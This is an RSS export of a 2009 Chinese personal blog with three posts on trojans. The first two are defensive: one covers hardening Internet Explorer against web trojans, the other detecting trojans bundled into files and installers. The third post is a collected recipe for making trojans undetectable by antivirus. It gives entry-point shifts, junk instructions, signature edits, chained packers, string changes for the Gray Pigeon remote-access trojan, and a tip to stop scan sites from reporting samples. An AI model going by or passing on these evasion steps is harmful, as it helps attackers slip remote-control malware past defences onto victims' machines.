<br>禁用脚本：打开IE的internet选项--&gt;安全-&gt;自定义级别，往下翻找到脚本--java小程序，禁用即可。(如图5)<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e098b08850a9c7cb555770e5eaa7d749333a294c2646f562ebac79954825110cc3eb7c19b8e0a7bbeb2830ae14811c840c444b5b97fd9b86b45f5d8c87bdee69ad870183b&amp;a=23&amp;b=25" target="_blank"><img style="width:526px;height:449px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e098b08850a9c7cb555770e5eaa7d749333a294c2646f562ebac79954825110cc3eb7c19b8e0a7bbeb2830ae14811c840c444b5b97fd9b86b45f5d8c87bdee69ad870183b&amp;a=23&amp;b=25" /></a><wbr /><br>图5修改IE禁用javascript脚本<br>当然也可以禁用VBScript就在脚本项目里面有几个全部选择禁用即可。最后单击一下[重置]即可生效最后单击确定退出。当然也可以直接把安全级别设成高就好了（如图5）。注：禁用了脚本会有很多想不到麻烦，因为绝大数网站都会用到的。如美化或者动画效果需要调用脚本才能实现<br>。<br>禁用(iframe)隐藏框架调用文件：方法基本和上面禁用脚本是一样的！（如图6）当然也可以直接把安全级别设成高就好了（如图5画圈圈处）<br><wbr /><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0ec058d8e10c1499d57e11c1feba02c3d188f9b023d190f6b3ced25ac3fcd114e8121b22034a0bc282a6da9f4fe678173337bf116de59c39e457bcea1d3eaa5e0dbda2a17e&amp;a=23&amp;b=24" target="_blank"><img style="width:354px;height:411px;border:0;" src="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0ec058d8e10c1499d57e11c1feba02c3d188f9b023d190f6b3ced25ac3fcd114e8121b22034a0bc282a6da9f4fe678173337bf116de59c39e457bcea1d3eaa5e0dbda2a17e&amp;a=23&amp;b=24" /></a><wbr /><br>图6 选项选禁用即可<br>⒋IE漏洞修补及意见<br>禁用脚本会导致浏览不正常或者页面出现很多不正常的问题不推荐使用！微软对于网页木马利用的IE漏洞都会发布相应的补丁我们只有即使补全以减小中招的可能！当然也可以使用非IE内核的浏览器如：Mozilla Firefox火狐浏览器（如图7）、Opera浏览器（如图8） 等，不管用什么浏览器即时更新软件并做好软件缺陷的补丁安装是很有必要的！<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e00eaa69146c561a0cd057835cc6581fa5344661efb670f7ee8f3e7768cff61055fde52ada75525c6fb263830ab2eda2bd5f363c3a85bf2de2ae160bb8142bb3dd3a569fe&amp;a=24&amp;b=25" target="_blank"><img style="width:292px;height:508px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e00eaa69146c561a0cd057835cc6581fa5344661efb670f7ee8f3e7768cff61055fde52ada75525c6fb263830ab2eda2bd5f363c3a85bf2de2ae160bb8142bb3dd3a569fe&amp;a=24&amp;b=25" /></a><wbr /><br>图 7 火狐浏览器截图<br><wbr /><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0eb2d05cb78afe6677ed6f499cc4c8c83f2dd2dc338f69937de55521853b8ff12cf9f080f6d1f4fd5ff03980da85a9f1f77ebb69b845ddcdabadc81b6787dd7d8a6f87d6f5&amp;a=25&amp;b=24" target="_blank"><img style="width:423px;height:421px;border:0;" src="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0eb2d05cb78afe6677ed6f499cc4c8c83f2dd2dc338f69937de55521853b8ff12cf9f080f6d1f4fd5ff03980da85a9f1f77ebb69b845ddcdabadc81b6787dd7d8a6f87d6f5&amp;a=25&amp;b=24" /></a><wbr /><br>图8Opera浏览器截图<br>本期小结：虽然网页木马很多但是我们只要掌握一些方法，我们还是可以将中招几率大大降低的！ <!--v:3.2--> ]]></description>
<category><![CDATA[网络攻防]]></category>
<author><![CDATA[214567620@qq.com(L. xin)]]></author>
<comments>http://214567620.qzone.qq.com/blog/1256186920#comment</comments>
<qz:effect>134218241</qz:effect>
<pubDate>Thu, 22 Oct 2009 04:48:40 GMT</pubDate>
<guid>http://214567620.qzone.qq.com/blog/1256186920</guid>
</item>

<item>
<title><![CDATA[入侵防御（一）]]></title>
<link>http://214567620.qzone.qq.com/blog/1256186258</link>
<description><![CDATA[<br>转载：出自暗组信息安全论坛 <a href="http://forum.darkst.com/" target="_blank">http://forum.darkst.com/</a><wbr /><br> <br>从本文你可以学到：<br>1. 如何识别文件是否捆绑木马<br>2. 如何处理解决捆绑木马文件<br>在PC个人电脑的不断普及和ADSL宽带逐渐成为主流的上网方式，你可以使用的从原来的电话拨号56K网速到现在的ADSL 1MB、小区LAN 10MB或者更高。网速快了这个事实让人欣喜，但是你有没有想过在互联网的普及使得你的电脑随时都有可能受到来自网上的各种攻击。本文将把你们带入一个安全网络时代，让你被攻击的可能性降到最低。<br>入侵防御总的说来应该分为3大类：<br>防捆绑木马入侵<br>防网页木马入侵<br>防漏洞扫描入侵<br> <br>一、 防捆绑木马入侵<br>现在的牧“马”者是越来越狡猾，他们常用文件捆绑的方法，将木马捆绑到图像、纯文本等常见的文件中，然后通过QQ、Email或MSN等将这些文件传送给受害者，而一旦不慎打开这些文件，你就“中招”了（当然是木马了）。那对付这些捆绑木马有哪些值得我们平时注意的？<br>先说说捆绑木马是什么，捆绑就是存在两个或两个以上的几个文件组合成的一个整体：但是只有一个文件真正被我们使用其他的则是后台悄悄运行植入我们的电脑。<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0ec0bed2f923d6513797430bc770e6a93bc2973339e444e8c0bb5fe9043461aedbf3285f1df59b35fade6276676cdd4075e58b334d5d2ea95a04737276fed2cc516cc895c6&amp;a=23&amp;b=25" target="_blank"><img style="width:536px;height:151px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0ec0bed2f923d6513797430bc770e6a93bc2973339e444e8c0bb5fe9043461aedbf3285f1df59b35fade6276676cdd4075e58b334d5d2ea95a04737276fed2cc516cc895c6&amp;a=23&amp;b=25" /></a><wbr /><br><br>捆绑木马的手段归纳起来共有四种：第一种是利用捆绑机软件和文件合并软件捆绑木马；第二种是利用WINRAR、WINZIP等软件制作自解压捆绑木马；第三种是利用软件打包软件制作捆绑木马；第四种是利用多媒体影音文件传播。不过，今天我们这里并不是介绍如何捆绑木马，而是针对这四种的捆绑木马方法给读者讲解如何识破的方法。首先我们来看如何识破第一种方法的诡计。<br>⒈利用捆绑机软件和文件合并软件捆绑木马（出现几率50%）<br>在进行这一步之前我们需要了解一下PE文件的一些基础知识：<br><wbr /><a href="http://b10.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e3ed8417c09c71045711a90e384d99642cfe7f44500446b54d4b60aa483e5236200bd3d1a7a235266dbc4de45acd62923de5a39c8c9d7cbe9771efcc6b0aabf54eba2aa0c&amp;a=24&amp;b=10" target="_blank"><img style="width:315px;height:291px;border:0;" src="http://b10.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e3ed8417c09c71045711a90e384d99642cfe7f44500446b54d4b60aa483e5236200bd3d1a7a235266dbc4de45acd62923de5a39c8c9d7cbe9771efcc6b0aabf54eba2aa0c&amp;a=24&amp;b=10" /></a><wbr /><br>PE文件也就是可执行应用程序文件 即应用程序 32位系统Window图形界面系统 常见后缀名：[.exe] 16位系统 即DOS文件系统 常见后缀名：[.com] 对于PE文件的知识我们就只要知道这些：在WINDOW32位下运行先从 DOS MZ header→PE header → Section → Overlay尾部数据基本就是这个流程， 下面我们开始详细介绍捆绑木马及识破方法。<br>捆绑模式有两种：一种是在原有的程序文件尾部添加数据，从而达到你运行正常的程序同时运行木马的效果；而另外一种就是利用捆绑器中自带的一个PE头文件来捆绑文件，在你运行这种类型的文件时他会先释放两个文件（一个是正常的被捆绑的文件，而另外一个则是木马或者其他附加给你的程序如：IE插件）后者在运行速度上可能稍慢于前者，利用第二种模式的捆绑木马最为多见<br>为了防范这类木马所以我们制定两种方案：<br>首先我们用PEID查是否存在尾部数据防范前者利用附加数据来捆绑木马，在则是用C32ASM查文件头个数以防范后者利用PE头捆绑木马（下面我们进入实例来说说）<br>先用PEID 看看有没有尾部数据显示 “Microsoft Visual C++ 6.0 [Overlay ]” Overlay就是尾部数据 见（如图1） 一般捆绑文件就是在尾部数据Overlay这里面，而不会放在头或者区段里！（但仅仅通过从这个判断是否有捆绑是不行的，需要做下步进行判断！）<br><wbr /><a href="http://b12.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e0d83bb34fac64c35f4a11cf2f7f25da73a8cb6aa0bbbe4d6c734a08dd868fdc1a31455d37ff3dfc8f5060665841cf8484061aee722b69674a7bf38ccae8a87c183265b02&amp;a=25&amp;b=12" target="_blank"><img style="width:423px;height:229px;border:0;" src="http://b12.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e0d83bb34fac64c35f4a11cf2f7f25da73a8cb6aa0bbbe4d6c734a08dd868fdc1a31455d37ff3dfc8f5060665841cf8484061aee722b69674a7bf38ccae8a87c183265b02&amp;a=25&amp;b=12" /></a><wbr /><br>（图1  PEID 查尾部数据）<br>在把文件拖到C32ASM窗口中 选16进制打开文件（如图2）然后利用ANSI码搜索 关键字“MZ”（如图3） 出现多个DOS MZ header且文件部分和（如图4）相似即可判断为该文件有多个PE头也就是存在多个程序（木马或者其他程序）在内部（从这个判断一般都是没错的了，除了少数程序例外。）<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0ee6c9541b827af8dfc33c4e5836cd82bf7401e5eca0890f06cd6d25398a98c06aa99fc24c5cf36d6a25e9a4969a37733650a5750755c19f63b6bc7a323152b61d0b88a568&amp;a=25&amp;b=25" target="_blank"><img style="width:275px;height:114px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0ee6c9541b827af8dfc33c4e5836cd82bf7401e5eca0890f06cd6d25398a98c06aa99fc24c5cf36d6a25e9a4969a37733650a5750755c19f63b6bc7a323152b61d0b88a568&amp;a=25&amp;b=25" /></a><wbr /><br>（图 2 C32ASM拖放打开文件提示界面）<br><wbr /><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e873ab07cf81a7766911e5b085f81e08796df3edf6023935b8344dee1246d43aff0f55d05d8f00cb96553fd1235a805c6686feb5c008399eda9842ec6fb35533bcb40aa4e&amp;a=12&amp;b=24" target="_blank"><img style="width:370px;height:154px;border:0;" src="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e873ab07cf81a7766911e5b085f81e08796df3edf6023935b8344dee1246d43aff0f55d05d8f00cb96553fd1235a805c6686feb5c008399eda9842ec6fb35533bcb40aa4e&amp;a=12&amp;b=24" /></a><wbr /><br><wbr /><a href="http://b12.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0edc3e34bfac320b092b84080ca370b6db48eecc7f160fa57061b60c555953454713442ea014625644c96dd39c5eeb64bdfcdaa8b700bd89738282b429dac1d4395d3aa670&amp;a=25&amp;b=12" target="_blank"><img style="width:140px;height:405px;border:0;" src="http://b12.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0edc3e34bfac320b092b84080ca370b6db48eecc7f160fa57061b60c555953454713442ea014625644c96dd39c5eeb64bdfcdaa8b700bd89738282b429dac1d4395d3aa670&amp;a=25&amp;b=12" /></a><wbr />（图 4 常见的PE头部 一般一个程序只有一个）<br><br>⒉利用WINRAR、WINZIP等压缩软件制作自解压捆绑木马 （出现几率30%）<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e2320c612057eb0b62e2c943d29c5c4b8023dad16191a5c405a384578e5de7223bb064fb335c3cf4b94213a9e87b5084536a3a0d44e1c93a849964ffb6cccce42bcfbc793&amp;a=25&amp;b=25" target="_blank"><img style="width:423px;height:229px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e2320c612057eb0b62e2c943d29c5c4b8023dad16191a5c405a384578e5de7223bb064fb335c3cf4b94213a9e87b5084536a3a0d44e1c93a849964ffb6cccce42bcfbc793&amp;a=25&amp;b=25" /></a><wbr /><br>（图5  RAR SFX自解压模块）<br>因为WINRAR是我们现在最常用的压缩软件所以我们必须小心点，不然就被图谋不愧的人利用了……。别和我说你没有安装WINRAR哦，如果是这样下面的步骤可能不一样哦。还是看情况把对于EXE可执行文件我们都可以使用如下方法进行检查：不要先运行而是先用PEID 查看看是 （RAR SFX）自解压模块（如图5），发现这点好办用RAR打开这个EXE就可以了 （如图 6）右键快速打开文件，打开后查看右边的注释（如图 7）显示如下：<br>;下面的注释包含自解压脚本命令<br>Setup=2.exe<br>Presetup=1.exe<br>Silent=1<br>Overwrite=1<br>一般Presetup=*.exe 这个为木马文件 而Setup=*.exe这个为正常文件但也有可能两个都是木马……，这些是不定的最保险还是解压出来用杀毒软件查杀一下，如果两个或者多个都没有被查杀那很可能这个木马已经被免杀处理过了这个时候最好是去其他地方重新下载一个吧，这样比较好。当然你也可以通过图标来判断（前提你知道你下载的这个文件原始图标应该是哪样的）。最后把那个你认为是木马的文件仍掉即可！<br><wbr /><a href="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0ef8593927d46585c05a70d47c28f00e8eebedfeac392070aef3e314c0d2c24bfb440a887127d4e2afd9df9cee7c9f7ab4697e1d2eb12ed612ab27552e6c0f2b030e1b7b55&amp;a=25&amp;b=24" target="_blank"><img style="width:363px;height:232px;border:0;" src="http://b24.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0ef8593927d46585c05a70d47c28f00e8eebedfeac392070aef3e314c0d2c24bfb440a887127d4e2afd9df9cee7c9f7ab4697e1d2eb12ed612ab27552e6c0f2b030e1b7b55&amp;a=25&amp;b=24" /></a><wbr /><br>（图 6 WINRAR右键快速打开文件）<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e96b2736cdedce3892336828d6ad6e167f6ce8e5c6c01c8bd74ecf98291f3f4fc47b0155e6519cb6ca1abf6e1854cc1556baee1592b7c599d637abeaea80426d680d2b214&amp;a=25&amp;b=25" target="_blank"><img style="width:472px;height:459px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e96b2736cdedce3892336828d6ad6e167f6ce8e5c6c01c8bd74ecf98291f3f4fc47b0155e6519cb6ca1abf6e1854cc1556baee1592b7c599d637abeaea80426d680d2b214&amp;a=25&amp;b=25" /></a><wbr /><br>（图 7 查看RAR注释的界面）<br>⒊利用软件打包软件制作捆绑木马 （出现几率10%）<br><wbr /><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e87432530b24a14e4630423aef46f0bd42d74c8ac4ade93d395cfefe639c2ee953103e3f1ce3b7e272bc115f4ed5a5296161e4af7852040f19012bd634fb7d55597af7f06&amp;a=25&amp;b=23" target="_blank"><img style="width:423px;height:229px;border:0;" src="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e87432530b24a14e4630423aef46f0bd42d74c8ac4ade93d395cfefe639c2ee953103e3f1ce3b7e272bc115f4ed5a5296161e4af7852040f19012bd634fb7d55597af7f06&amp;a=25&amp;b=23" /></a><wbr /><br><br>（图8用Nullsoft Pimp 打包的安装程序）<br>这里说的软件打包后的程序也就是我们通常使用的安装程序 即：（SETUP.exe）先用PEID查壳（如图 8）这类捆绑是很难在不运行安装程序的情况下分离的，要分离的话可能只有反编译安装包了（不过这样做是很危险的，而且很难避免安装程序的不运行）。下面我们就教大家一种最简单的方法识别这类可能存在问题的安装程序，就是利用MD5值来判断文件是否为正常的安装程序，当然要使用MD5来判断必须要有另外一个相同的安装包即软件版本相同或者和安装程序大小相同的你才可以继续以下步骤。当你已经下载了一个安装程序你可以尝试换个非该站下载点的另外一个地址的安装包，如果可能当然最好是去到官方下载，下载后用WINMD5工具对比一下MD5值 使用技巧：选中两个需要对比MD5的文件用鼠标拖动到程序窗口处就可以进行对比了 （如图 9）对比后通过看MD5值就可以发现两个安装包不一样了（因为世界上几乎没有一个不相同的文件拥有相同的MD5值就和人的指纹一样具有特殊性是不能被模仿的，除非复制一分但是不能改动文件本身的，只要改变了文件任何地方他的MD5值也就随之改变），既然知道它有这个特性你就可以做出判断了，大多数我们都是以官方站下载、大软件站下载的为主把另外那个删除就可以了。<br><wbr /><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e7a889651ec6084d4acc25f24752681408fc2400b50a13c66d1fc7672a4bfbfe3d22dbb546ed6f1b917a882b7d173ab62e4bace8a0c188540ff04f5a078b3c56ec18a13e2&amp;a=25&amp;b=23" target="_blank"><img style="width:555px;height:209px;border:0;" src="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e7a889651ec6084d4acc25f24752681408fc2400b50a13c66d1fc7672a4bfbfe3d22dbb546ed6f1b917a882b7d173ab62e4bace8a0c188540ff04f5a078b3c56ec18a13e2&amp;a=25&amp;b=23" /></a><wbr /><br><br>（图 9用WINMD5查看两个相同软件的安装包）<br>⒋利用多媒体影音文件传播（出现几率是10%）<br>很多读者听到这个的时候应该都很惊讶吧，就连听音乐和看电影都有可能中木马啊不过这类木马大部分还是基于IE漏洞或者系统漏洞传播或者软件自身缺陷，内置浏览网页的软件或插件出现漏洞问题导致的（也就是必须通过网页木马才可以生效，缺这个环节它也是虚惊一场）。这类木马一般出现在格式为： .wma  .mp3  .rm  .swf这三种如果还有别的我就不清楚了。但都是先制作RM影音木马（方法就是利用Helix Producer Plus或者 图形版的RealMedia Editor来合并事件达到设定时间打开指定的含有恶意代码的网页），然后利用其他格式转换软件将RM格式转换成其他格式的多媒体文件（如：.wma .mp3 等）但是仍然保留打开网页连接的特性。对于Flash的影片.swf也可以弄跳转的这种很难防御的……。<br>对于要彻底防御这类影音木马我们只有禁止当前所有程序创建新的网络连接，只有这样才能才能在听音乐或者看电影的时候不出在弹出窗口中访问连接含有恶意代码网页，从而完全杜绝这类木马的危害。因为几乎大部分低版本的多媒体播放器都存在这漏洞。所以我们要打好该播放器的安全更新补丁或者及时升级最新版本的播放器。如果还不能解决这个问题的话可以试试看我提供给大家的这两种方法：<br>第一种：暂时断开网络连接播放整个文件是否存在问题（适用于短小的音乐文件，对于比较长时间的影音推荐还是关闭网络连接看吧。）<br>第二种：使用手动查杀必备的大哥大工具 冰刃（IceSword）（如图10）禁止创建新进程，主要是防御浏览多媒体文件时突然弹出的浏览器窗口（如 微软的IE 、腾讯的TT ）。使用步骤如下：打开冰刃进入主界面→单击“文件”菜单→选择“设置”→钩选“禁止进线程创建”（如图 11）最后在单击确定即可。如要恢复逆操作一遍即可。经过第二种方法后你大可以放心的享受多媒体了，因为大部分通过浏览器起作用的恶意代码都调用不起来的。<br><wbr /><a href="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e26c61c8c5ba0c045a38986eb9cf82a7b4b2be46464ddc738032eaba89c0725e370f05a02d61ea07a0cdc64814713187ecd3a2d46c54adfd4eaa4dff31cc3df125de51edc&amp;a=24&amp;b=25" target="_blank"><img style="width:555px;height:388px;border:0;" src="http://b25.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e26c61c8c5ba0c045a38986eb9cf82a7b4b2be46464ddc738032eaba89c0725e370f05a02d61ea07a0cdc64814713187ecd3a2d46c54adfd4eaa4dff31cc3df125de51edc&amp;a=24&amp;b=25" /></a><wbr /><br>（图 10（IceSword）的主界面）<br><wbr /><a href="http://b12.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e33eeff618720aa90e545629d197e46cc312dda034386ea647bccab7974c13bdb906080fdc6c02863bdcd932258374704c5ea984fcce623f855b77d740a6a4e619f2e5ec0&amp;a=24&amp;b=12" target="_blank"><img style="width:282px;height:239px;border:0;" src="http://b12.photo.store.qq.com/http_imgload.cgi?/rurl4_b=807be0d7064ca63406d7e517cd7bbc0e33eeff618720aa90e545629d197e46cc312dda034386ea647bccab7974c13bdb906080fdc6c02863bdcd932258374704c5ea984fcce623f855b77d740a6a4e619f2e5ec0&amp;a=24&amp;b=12" /></a><wbr /><br>（图11禁止进线程创建）<br>① 防捆绑木马入侵小结：工具不是万能的而人是活的，大家可以利用以上的方法加以结合即可达到事半功倍的效果。 <!--v:3.2--> ]]></description>
<category><![CDATA[网络攻防]]></category>
<author><![CDATA[214567620@qq.com(L. xin)]]></author>
<comments>http://214567620.qzone.qq.com/blog/1256186258#comment</comments>
<qz:effect>134218241</qz:effect>
<pubDate>Thu, 22 Oct 2009 04:37:38 GMT</pubDate>
<guid>http://214567620.qzone.qq.com/blog/1256186258</guid>
</item>

<item>
<title><![CDATA[最新免杀方法收集]]></title>
<link>http://214567620.qzone.qq.com/blog/1218675048</link>
<description><![CDATA[一.入口点加1免杀法:<br>1.用到工具PEditor<br>2.特点:非常简单实用,但有时还会被卡巴查杀.<br>3.操作要点:用PEditor打开无壳木马程序,把原入口点加1即可<br>二.变化入口地址免杀法:<br>1.用到工具:OllyDbg,PEditor<br>2.特点:操作也比较容易,而且免杀效果比入口点加1点要佳.<br>3.操作要点:用OD载入无壳的木马程序,把入口点的前二句移到零区域去执行,然后又跳回到入口点的下面第三句继续执行.最后用PEditor把入口点改成零区域的地址.<br>三.加花指令法免杀法:<br>1.用到工具:OllyDbg,PEditor<br>2.特点:免杀通用性非常好,加了花指令后,就基本达到大量杀毒软件的免杀.<br>3.操作要点:用OD打开无壳的木马程序,找到零区域,把我们准备好的花指令填进去填好后又跳回到入口点,保存好后,再用PEditor把入口点改成零区域处填入花指令的着地址.<br>四.加壳或加伪装壳免杀法:<br>1.用到工具:一些冷门壳,或加伪装壳的工具,比如木马彩衣等.<br>2.特点:操作简单化,但免杀的时间不长,可能很快被杀,也很难躲过卡巴的追杀<br>3.操作要点:为了达到更好的免杀效果可采用多重加壳,或加了壳后在加伪装壳的免杀效果更佳<br>五.打乱壳的头文件或壳中加花免杀法:<br>1.用到工具:秘密行动 ,UPX加壳工具.<br>2.特点:操作也是傻瓜化,免杀效果也正当不错,特别对卡巴的免杀效果非常好<br>3.操作要点:首先一定要把没加过壳的木马程序用UPX加层壳,然后用秘密行动这款工具中的SCramble功能进行把UPX壳的头文件打乱,从而达到免杀效果.<br>六.修改文件特征码免杀法:<br>1.用到工具:特征码定位器,OllyDbg<br>2.特点:操作较复杂,要定位修改一系列过程,而且只针对每种杀毒软件的免杀,要达到多种杀毒软件的免杀,必需修改各种杀毒软件的特征码.但免杀效果好<br>特征码修改方法<br>特征码修改包括文件特征码修改和内存特征码修改，因为这二种特征码的修改方法是通用的。所以就对目前流行的特征码修改方法作个总节。<br>方法一:直接修改特征码的十六进制法<br>1.修改方法:把特征码所对应的十六进制改成数字差1或差不多的十六进制.<br>2.适用范围:一定要精确定位特征码所对应的十六进制,修改后一定要测试一下能否正常使用.<br>方法二:修改字符串大小写法<br>1.修改方法:把特征码所对应的内容是字符串的,只要把大小字互换一下就可以了.<br>2.适用范围:特征码所对应的内容必需是字符串,否则不能成功. <br>方法三:等价替换法<br>1.修改方法:把特征码所对应的汇编指令命令中替换成功能类拟的指令.<br>2.适用范围:特征码中必需有可以替换的汇编指令.比如JN,JNE 换成JMP等.如果和我一样对汇编不懂的可以去查查8080汇编手册. <br>方法四:指令顺序调换法<br>1.修改方法:把具有特征码的代码顺序互换一下.<br>2.适用范围:具有一定的局限性,代码互换后要不能影响程序的正常执行<br>方法五:通用跳转法<br>1.修改方法:把特征码移到零区域(指代码的空隙处),然后一个JMP又跳回来执行.<br>2.适用范围:没有什么条件,是通用的改法,强烈建议大家要掌握这种改法.<br>木马免杀的综合修改方法<br>文件免杀方法：<br>1.加冷门壳<br>2.加花指令<br>3.改程序入口点<br>4.改木马文件特征码的5种常用方法<br>5.还有其它的几种免杀修改技巧 <br>内存免杀方法<br>修改内存特征码：<br>方法1&gt;直接修改特征码的十六进制法<br>方法2&gt;修改字符串大小写法<br>方法3&gt;等价替换法<br>方法4&gt;指令顺序调换法<br>方法5&gt;通用跳转法<br>壳入口修改法<br>1.用到工具：压缩壳 OD<br>2.特点：操作简单 免杀效果好<br>3.操作步骤：首先给木马加压缩壳 然后用OD载入...<br>在入口处的前15句中.....<br>NOP掉某些代码或者等价代换某些代码（不影响运行的前提下）...<br>改完之后保存就可以了<br><br>--------------------------------------------------------------------------------<br> <br><br>--------------------------------------------------------------------------------<br><br>个人总结的免杀组合如下:<br><br>一、用到的工具：<br>1:加壳 　　使用 aspack212 　　压缩一次2:加免疫 使用 凌点文件免疫器 做个免疫3:加入口　 使用 入口加一免杀 　加入口一次<br>4:加密　　 使用 MaskPE 　加密一次<br>5:加花　　 使用 超级加花免杀器 加花一次<br>6:加壳　　 使用 北斗3.6 压缩一次<br>7:加密 使用 使用 vmprotect 加密入口一次<br>8:加保护　使用 ASProtect 最后操作<br>二、用到的工具：<br>1 MaskPE1.8.exe<br>2 PEditor.exe<br>3 黑客动画吧加花指令伪装器<br>4 Private.exe5 北斗4.1破解版<br>三、用到的工具：<br>修改入口点<br>004A1E48 原入口点<br>00467F7C 新入口点<br>之后用<br>maskpe<br>加2次北斗壳<br>四、用到的工具<br>这个免杀分为四步：<br>1、修改进程过专杀  <br>2、花花添加器2006 加花<br>3、svkp 加密4、超级加花器v1.2 再加花<br>五、用到的工具<br>花指令＋修改文件头<br>mov edi, edipush ebp<br>add eax, -1<br>inc eax<br>jmp 004A1E49<br>原入口点：004A1E48<br>新入口点：00496EAC六、用到的工具<br>1.Aspack[D] v0.3.exe<br>2.华夏免疫2.2.exe<br>3.MaskPE.exe<br>4.超级加花器v1.1.exe<br>七、用到的工具<br>1.入口加1 <br>2.MaskPE2.03.ASPack <br>4.花蝴蝶第2个花  <br>5.超级加花 <br>6.入口加17.北斗4.1破解版 杀软查查看`好`过了 最后测试上线 OK<br>八、用到的工具<br>1.入口加1  <br>2.maskpe <br>3.北斗4.1破解版 <br>4.vmprotect <br>5.hmimys-Packer.exe <br>6.北斗4.1破解版<br>九、用到的工具<br>主要用到了3个软件上兴2007的免杀<br>1.MaskPE<br>2.花指令添加器<br>3.ASProtect<br>先用MaskPE加壳，在用花指令添加器加花，然后用ASProtect保护一下<br>十、用到的工具<br>pack4.0<br>北斗3.7 [两次]<br>vmprotect<br>十一、过专杀的方法 <br>\Program Files\Internet Explorer\IEXPLORE.EXE<br>\windows\system32\svchost.exetttttttttttttttt<br>把<br>IEXPLORE.EXE 换成svchost.exe多的位置补00 <br>svchost.exee <br>十二、用到的工具<br>1.MaskPE 这里选最后一个<br>2.hmimys-Packer<br>3.凌点文件免疫器 V2.0<br>4.北斗4.1破解版<br>5.vmprotect v1.4<br>--------------------------------------------------------------------------------<br>工具:MaskPE 堀北压缩 0.28 beta ASProtect 花指令 <br>1.先去头 <br>2.加3区段 3花 乱跳(3个花 随便跳转 .不需要1花 跳 2花 跳 3花 这样) <br>3.再加maskpe 加section information <br>4.再用 堀北压缩 <br>5.再 ASProtect 加密壳.<br><br>--------------------------------------------------------------------------------<br><br>关于免杀世界反毒网所有杀软的思路!<br><br>1:生成无壳木马服务端(地球人都知道)<br>2:去头加花,要求,新建区段,把原入口写入新区段,然后再建区段,再建新头,跳回新区段的老入口,就是头前头,然后老入口不要直接回执行,再跳入空白处再加花指令,然后再回去原执行处,这样就完成了去头加花头前头,头后头,头前头和原头都是新区段,而且不是同区段.<br>3:再次用软件加密加花,可以多次加,只要程序可以正常运行就行.到这里基本已经过了主流全部国内杀软了,包括瑞内.<br>4:加壳,不需要加乱七八糟的壳,随便主流压缩壳就行,但是要重复加壳.加完后再把加过壳的程序去头加花头前头,头后头,这样就壳变型了.要注意的是程序可正常执行就可以了.<br>5:资源重建<br>6:再次加壳,一般主流压缩壳就行,双壳,注意不要用前面加过的壳就行,乱七八糟的壳别用,用了反而会被杀软杀,不是杀你程序,而是杀壳,不信你试试!<br>7:再次带壳去头加区段加花,头前头,头后头.<br>8:资源重建<br>9:加个普通压缩壳,双壳单壳随便!<br>10:丢世界反毒网上试试,注意把锁关上,distribute也关上,如果不关等于上报!<br><br>--------------------------------------------------------------------------------<br><br>鸽子免杀<br>1.OD工具<br>DESCRIPTION 一共有3个，修改前2个<br>PHOTOSHOPKM<br>HACKER 一共有2个，全部修改<br>KMBLOG<br>PACKAGEINFO 一共有1个，全部修改<br>CCCKMBLOGMM<br>TMAINFORMVER2 一共有3个，全部修改<br>FLASHCKMBLOGM<br>灰鸽子远程控制服务端安装成功 